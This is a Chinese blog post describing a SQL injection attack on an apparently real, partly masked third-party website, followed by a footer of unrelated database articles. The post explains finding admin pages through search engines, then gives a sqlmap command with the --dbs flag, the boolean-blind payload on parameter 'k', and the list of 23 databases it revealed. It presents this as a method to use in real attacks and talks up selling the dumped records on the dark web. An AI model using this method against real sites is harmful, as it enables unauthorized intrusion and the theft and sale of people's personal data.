某站点存在SQL注入,直接可进行脱库(实战可参考此方法)

简介: 某站点存在SQL注入,直接可进行脱库(实战可参考此方法)

       首先选择需要扫描的站点,最简单粗暴的方法就是浏览器直接搜索,什么?不会?自行gu狗吧。
比如我要扫描后台,看得懂的扣1,看不懂的也扣1。

然后,你就可以看到好多好多网站的后台,随便点一个进去,慢慢折腾。
就这样的方法,搞到一SQL注入点

python sqlma.py -u http://dianping.******com.cn/valuation/index.php/index/search?k=think --dbs

python大法好,sqlmap大法更好。不会用的自行gu狗
注入点注入,得到数据库

Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm
---
back-end DBMS: MySQL >= 5.0.0
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: k
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: k=think') AND 2578=2578 AND ('QNdm'='QNdm
---
back-end DBMS: MySQL 5
available databases [23]:
[*] antispam
[*] information_schema
[*] lenovo_osd
[*] lenovo_report
[*] lenovovaluation
[*] lenovovaluation_test
[*] lenovoweixin
[*] lwttest
[*] mysql
[*] performance_schema
[*] report
[*] rrwechat
[*] test
[*] testa
[*] valuation_uat
[*] vmall
[*] vmall_test
[*] weixin
[*] weixin_ceshi
[*] weixin_test
[*] weixin_uat
[*] wxshopuat
[*] yunyingweixin

随便进入一个表,


这信息好像并没有什么ruan用,但是,仅仅只是这信息没什么用而已,在某些“下面的网”一条信息 可能就价值一两块,你有几百万条数据,不直接迎娶白富美,走向人生巅峰。(也有可能送你一副白金手镯 手动滑稽0.0)

相关文章
|
4月前
|
SQL 运维 监控
SQL查询太慢?实战讲解YashanDB SQL调优思路
本文是Meetup第十期“调优实战专场”的第二篇技术文章,上一篇《高效查询秘诀,解码YashanDB优化器分组查询优化手段》中,我们揭秘了YashanDB分组查询优化秘诀,本文将通过一个案例,助你快速上手YashanDB慢日志功能,精准定位“慢SQL”后进行优化。
|
2月前
|
SQL 数据采集 关系型数据库
实现MySQL与SQL Server之间数据迁移的有效方法
总的来说,从MySQL到SQL Server的数据迁移是一个涉及到很多步骤的过程,可能会遇到各种问题和挑战。但只要精心规划、仔细执行,这个任务是完全可以完成的。
109 18
|
2月前
|
SQL 人工智能 数据库
SQL Server 2025 - 从本地到云端的 AI 就绪企业数据库
SQL Server 2025 - 从本地到云端的 AI 就绪企业数据库
126 0
SQL Server 2025 - 从本地到云端的 AI 就绪企业数据库
|
2月前
|
SQL Java 数据库连接
Java中实现SQL分页的方法
无论何种情况,选择适合自己的,理解了背后的工作原理,并能根据实际需求灵活变通的方式才是最重要的。
72 9
|
3月前
|
SQL 关系型数据库 MySQL
【MySQL】SQL分析的几种方法
以上就是SQL分析的几种方法。需要注意的是,这些方法并不是孤立的,而是相互关联的。在实际的SQL分析中,我们通常需要结合使用这些方法,才能找出最佳的优化策略。同时,SQL分析也需要对数据库管理系统,数据,业务需求有深入的理解,这需要时间和经验的积累。
102 12
|
3月前
|
SQL 关系型数据库 MySQL
大数据新视界--大数据大厂之MySQL数据库课程设计:MySQL 数据库 SQL 语句调优方法详解(2-1)
本文深入介绍 MySQL 数据库 SQL 语句调优方法。涵盖分析查询执行计划,如使用 EXPLAIN 命令及理解关键指标;优化查询语句结构,包括避免子查询、减少函数使用、合理用索引列及避免 “OR”。还介绍了索引类型知识,如 B 树索引、哈希索引等。结合与 MySQL 数据库课程设计相关文章,强调 SQL 语句调优重要性。为提升数据库性能提供实用方法,适合数据库管理员和开发人员。
|
4月前
|
SQL 数据库连接 Linux
数据库编程:在PHP环境下使用SQL Server的方法。
看看你吧,就像一个调皮的小丑鱼在一片广阔的数据库海洋中游弋,一路上吞下大小数据如同海中的珍珠。不管有多少难关,只要记住这个流程,剩下的就只是探索未知的乐趣,沉浸在这个充满挑战的数据库海洋中。
98 16
|
8月前
|
SQL 监控 安全
Flask 框架防止 SQL 注入攻击的方法
通过综合运用以上多种措施,Flask 框架可以有效地降低 SQL 注入攻击的风险,保障应用的安全稳定运行。同时,持续的安全评估和改进也是确保应用长期安全的重要环节。
332 71
|
8月前
|
SQL 数据库 UED
SQL性能提升秘籍:5步优化法与10个实战案例
在数据库管理和应用开发中,SQL查询的性能优化至关重要。高效的SQL查询不仅可以提高应用的响应速度,还能降低服务器负载,提升用户体验。本文将分享SQL优化的五大步骤和十个实战案例,帮助构建高效、稳定的数据库应用。
559 3
|
8月前
|
SQL 缓存 监控
SQL性能提升指南:五大优化策略与十个实战案例
在数据库性能优化的世界里,SQL优化是提升查询效率的关键。一个高效的SQL查询可以显著减少数据库的负载,提高应用响应速度,甚至影响整个系统的稳定性和扩展性。本文将介绍SQL优化的五大步骤,并结合十个实战案例,为你提供一份详尽的性能提升指南。
381 0